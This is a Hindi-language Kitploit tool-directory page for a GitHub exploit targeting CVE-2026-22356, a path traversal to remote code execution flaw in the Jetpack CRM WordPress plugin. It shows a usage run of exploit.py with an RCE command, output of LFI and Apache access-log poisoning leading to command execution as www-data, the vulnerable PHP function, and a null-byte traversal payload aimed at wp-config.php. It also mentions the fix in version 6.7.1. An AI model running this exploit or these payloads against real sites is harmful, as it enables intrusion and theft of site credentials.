Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22356 — CVE-2026-22356: Jetpack CRM पाथ ट्रैवर्सल भेद्यता और RCE | Kitploit
उपकरण/GitHubGitHub/xxconi/cve-2026-22356
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubxxconi/cve-2026-22356

CVE-2026-22356

CVE-2026-22356: Jetpack CRM पाथ ट्रैवर्सल भेद्यता और RCE

रिपॉजिटरी देखें
2 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-22356: Jetpack CRM पथ ट्रैवर्सल भेद्यता और RCE

चेतावनी: यह उपकरण केवल अधिकृत परीक्षण वातावरण में उपयोग किया जाना चाहिए। अवैध उपयोग के लिए पूरी तरह से उपयोगकर्ता जिम्मेदार है।

📥 आवश्यकताएँ

root@kitploit:~
pip3 install requests urllib3
root@kitploit:~
$ python3 exploit.py https://example.com --rce --cmd "id"
[+] Target is VULNERABLE to LFI!
[*] Attempting Log Poisoning for RCE...
[*] Searching for accessible log files...
[*] Trying: ../../../../var/log/apache2/access.log
[+] Found accessible log file: ../../../../var/log/apache2/access.log
[*] Poisoning log file: ../../../../var/log/apache2/access.log
[+] Payload injected into log file.
[*] Executing command: id

[+] Command Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@kitploit:~
function jpcrm_load_admin_page( $page_name, $alt_path = ZEROBSCRM_PATH ) {
    $target_file = $alt_path . "admin/$page_name.page.php";
    if ( file_exists( $target_file ) ) {
        require_once $target_file;
    }
}

इस कोड में, $page_name बिना किसी सत्यापन के सीधे उपयोग किया जाता है, इसलिए हमलावर page=../../../wp-config.php%00 भेजकर require_once("admin/../../../wp-config.php%00.page.php") कॉल को ट्रिगर कर सकता है। जब PHP नल बाइट को फ़ाइल नाम के अंत के रूप में व्याख्या करता है, तो wp-config.php फ़ाइल निष्पादित हो जाती है।

6.7.1 संस्करण में, realpath() और strpos() जाँच जोड़कर इस कोड को ठीक किया गया है।

यह दस्तावेज़ CVE-2026-22356 भेद्यता को समझने और आपके अधिकृत परीक्षणों में उपयोग करने के लिए तैयार किया गया है। अवैध उपयोग पूरी तरह से उपयोगकर्ता की जिम्मेदारी है।

टूल डाउनलोड करें